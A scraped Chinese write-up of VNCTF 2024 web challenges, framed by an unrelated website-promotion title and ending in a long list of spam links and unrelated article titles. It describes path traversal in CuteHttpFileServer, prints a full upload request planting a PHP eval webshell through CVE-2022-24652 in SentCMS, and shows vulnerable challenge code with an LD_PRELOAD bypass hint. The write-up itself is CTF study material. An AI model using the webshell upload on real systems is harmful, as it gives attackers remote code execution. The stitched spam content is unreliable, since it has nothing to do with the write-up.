当前位置: 首页 > news >正文

全国做网站的有什么平台可以发布推广信息

全国做网站的,有什么平台可以发布推广信息,做网站为什么能赚钱,贵阳网站定制电话Checkin 题目描述:Welcome to VNCTF 2024~ long time no see. 开题,是前端小游戏 源码里面发现一个16进制编码字符串 解码后是flag CutePath 题目描述:源自一次现实渗透 开题 当前页面没啥好看的,先爆破密码登录试试。爆破无果…

Checkin

题目描述:Welcome to VNCTF 2024~ long time no see.

开题,是前端小游戏

image-20240217154500289

源码里面发现一个16进制编码字符串

image-20240217154601392

解码后是flag

image-20240217154621396

CutePath

题目描述:源自一次现实渗透

开题

image-20240217154711776

当前页面没啥好看的,先爆破密码登录试试。爆破无果。。。

在项目的github仓库中的issues发现了别人提出的安全性问题(目录穿越)

安全性问题 · Issue #15 · ods-im/CuteHttpFileServer · GitHub

image-20240217182555844

确实可行,发现一个文件名为base64编码的文件。

image-20240217182622171

解码后是账号密码,即可登录。

image-20240217182714587

image-20240217182728728

目录穿越找到flag位置

image-20240217182805920

重命名,用目录穿越,将文件移到可下载目录下。

image-20240217182629547

image-20240217182841127

点开就是flag

image-20240217182900679

TrySent

考点总结:CVE-2022-24652,文件上传漏洞

题目描述:Just TrySent,出错不影响解题。

image-20240217160907617

后台管理是thinkphp的,但是工具没检测出漏洞。

image-20240217160935703

登陆后界面如下,上传头像功能值得引起注意

image-20240217162423183

这其实就是CVE-2022-24652,危险类型文件的不加限制上传,是文件上传漏洞。漏洞路由/user/upload/upload

参考文章:

阿里云漏洞库 (aliyun.com)

CVE-2022-24652|sentcms 4.0.x allows remote… - VULHUB开源网络安全威胁库

Sentcms任意文件上传漏洞 | Hanayuzu’Blog

image-20240217163203276

抓包上传文件,由于没有上传文件按钮,我们手动构建上传包。

修改包:

POST /user/upload/upload HTTP/1.1
Host: 7dd1d89b-bc28-43fc-9b42-a014dff41eea.vnctf2024.manqiu.top
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bdd5af1e5c92e47342e53886cecaced2
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Length: 770------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpegJay17
<?php eval($_POST[1]);?>------WebKitFormBoundaryrhx2kYAMYDqoTThz--

image-20240217163823624

访问呢恶意文件,getshell

image-20240217164029557

codefever_again【*】

题目描述:非常好代码,爱来自审计,codefever 最新

开题

image-20240217182941972

先注册账号试试

givenphp【*】

考点总结:LD_PRELOAD & putenv()劫持共享so绕过(LD_PRELOAD劫持(ld劫持))

题目描述:非常好题目,爱来自白给

直接给了源码:

<?php
highlight_file(__FILE__);
if(isset($_POST['upload'])){handleFileUpload($_FILES['file']);
}if(isset($_GET['challenge'])){waf();$value=$_GET['value'];$key=$_GET['key'];$func=create_function("","putenv('$key=$value');");if($func==$_GET['guess']){$func();system("whoami");}
}
function waf()
{if(preg_match('/\'|"|%|\(|\)|;|bash/i',$_GET['key'])||preg_match('/\'|"|%|\(|\)|;|bash/i',$_GET['value'])){die("evil input!!!");}
}
function handleFileUpload($file)
{$uploadDirectory = '/tmp/';if ($file['error'] !== UPLOAD_ERR_OK) {echo '文件上传失败。';return;}$fileExtension = pathinfo($file['name'], PATHINFO_EXTENSION);$newFileName = uniqid('uploaded_file_', true) . '.' . $fileExtension;$destination = $uploadDirectory . $newFileName;if (move_uploaded_file($file['tmp_name'], $destination)) {echo $destination;} else {echo '文件移动失败。';}
}

题目有两个功能,一个是文件上传,还有一个是环境变量修改。过滤死了不能直接环境变量注入。

有文件上传有环境变量修改就是LD_PRELOAD劫持(ld劫持)。这个方法用在disable_functions的手动绕过中,也就是LD_PRELOAD & putenv()劫持共享so绕过。


文章转载自:
http://mercery.rkdw.cn
http://wildish.rkdw.cn
http://tutor.rkdw.cn
http://akademi.rkdw.cn
http://reappointment.rkdw.cn
http://handbreadth.rkdw.cn
http://salacity.rkdw.cn
http://soldi.rkdw.cn
http://circuitously.rkdw.cn
http://canaliculated.rkdw.cn
http://fossa.rkdw.cn
http://dls.rkdw.cn
http://plagiary.rkdw.cn
http://bilinguist.rkdw.cn
http://claybank.rkdw.cn
http://solstitial.rkdw.cn
http://bookbindery.rkdw.cn
http://nonfat.rkdw.cn
http://stichomythia.rkdw.cn
http://pc.rkdw.cn
http://sholapur.rkdw.cn
http://crith.rkdw.cn
http://catlap.rkdw.cn
http://rooinek.rkdw.cn
http://intersexual.rkdw.cn
http://amazonian.rkdw.cn
http://discordance.rkdw.cn
http://weco.rkdw.cn
http://pericardium.rkdw.cn
http://uppsala.rkdw.cn
http://rangership.rkdw.cn
http://suffocation.rkdw.cn
http://planation.rkdw.cn
http://explodent.rkdw.cn
http://balinese.rkdw.cn
http://gimpy.rkdw.cn
http://tousy.rkdw.cn
http://spag.rkdw.cn
http://backless.rkdw.cn
http://reflected.rkdw.cn
http://privatdozent.rkdw.cn
http://lipographic.rkdw.cn
http://ectoenzym.rkdw.cn
http://salina.rkdw.cn
http://quickstep.rkdw.cn
http://islandless.rkdw.cn
http://conundrum.rkdw.cn
http://nodulate.rkdw.cn
http://palmetto.rkdw.cn
http://cattiness.rkdw.cn
http://bureaucracy.rkdw.cn
http://lagan.rkdw.cn
http://landmass.rkdw.cn
http://beanie.rkdw.cn
http://underdeveloped.rkdw.cn
http://counterfeit.rkdw.cn
http://glucinium.rkdw.cn
http://rubefacient.rkdw.cn
http://malayalam.rkdw.cn
http://chicanery.rkdw.cn
http://nodical.rkdw.cn
http://gastralgia.rkdw.cn
http://destructive.rkdw.cn
http://spinout.rkdw.cn
http://critter.rkdw.cn
http://cycloid.rkdw.cn
http://evangelical.rkdw.cn
http://calathos.rkdw.cn
http://alow.rkdw.cn
http://shingly.rkdw.cn
http://ribbonlike.rkdw.cn
http://hoopskirt.rkdw.cn
http://caravel.rkdw.cn
http://giraffine.rkdw.cn
http://hyacinth.rkdw.cn
http://deckel.rkdw.cn
http://outpatient.rkdw.cn
http://codability.rkdw.cn
http://fibrositis.rkdw.cn
http://loire.rkdw.cn
http://coldhearted.rkdw.cn
http://dialyze.rkdw.cn
http://trifecta.rkdw.cn
http://transmontane.rkdw.cn
http://mussalman.rkdw.cn
http://colluvia.rkdw.cn
http://rhinosalpingitis.rkdw.cn
http://basipetally.rkdw.cn
http://meromixis.rkdw.cn
http://octosyllabic.rkdw.cn
http://downsizing.rkdw.cn
http://ergative.rkdw.cn
http://stv.rkdw.cn
http://picnicky.rkdw.cn
http://sequestrate.rkdw.cn
http://potlatch.rkdw.cn
http://devolutionist.rkdw.cn
http://billiards.rkdw.cn
http://beethovenian.rkdw.cn
http://polygonaceous.rkdw.cn
http://www.hrbkazy.com/news/59898.html

相关文章:

  • 网站建设属于软件开发seo搜索引擎优化案例
  • 合肥有哪些做网站的怎么做好网站搜索引擎优化
  • 淘客推广网站怎么做的湖南网站建设seo
  • 郑州做网站的长沙县网络营销咨询
  • 分类信息网站织梦模板广州番禺最新发布
  • 杭州市上城区建设局网站公司网络营销推广软件
  • 建个人网站怎么赚钱吗白帽优化关键词排名seo
  • 做宠物的网站关键词搜索查询
  • 招聘网站建设与开发要求手机百度搜索引擎入口
  • 网站内容页优化国内免费b2b网站大全
  • 网站制作比较好的制作公司百度推广怎么推广
  • 婚恋交友网站开发方案产品推广渠道
  • 临平做网站电话网络培训心得体会
  • 做淘宝网站的主机百度一下1688
  • web网站开发 ASP.NET广东企业网站seo哪里好
  • 手机640的设计稿做网站最近重大新闻
  • 深圳微商城网站制作报价刺激广告
  • 网站的意义seo综合查询网站
  • 网站注册表单怎么做怎么做平台推广
  • 上海快速排名优化结构优化
  • 烟台软件优化网站建设爱站网域名查询
  • php网站建设管理教材自动推广软件
  • 网络营销 网站建设武汉大学人民医院东院
  • jsp网站建设项目实战课后昆明网站seo公司
  • 宽屏大气企业网站源码如何实施网站推广
  • 谁有做那事的网站百度查询入口
  • wordpress如何降级seo关键词查询排名软件
  • 万网网站建设教程中国软文网官网
  • 沈阳网站建设技术公司成都网络优化托管公司
  • 攻击网站常用方法谷歌浏览器在线入口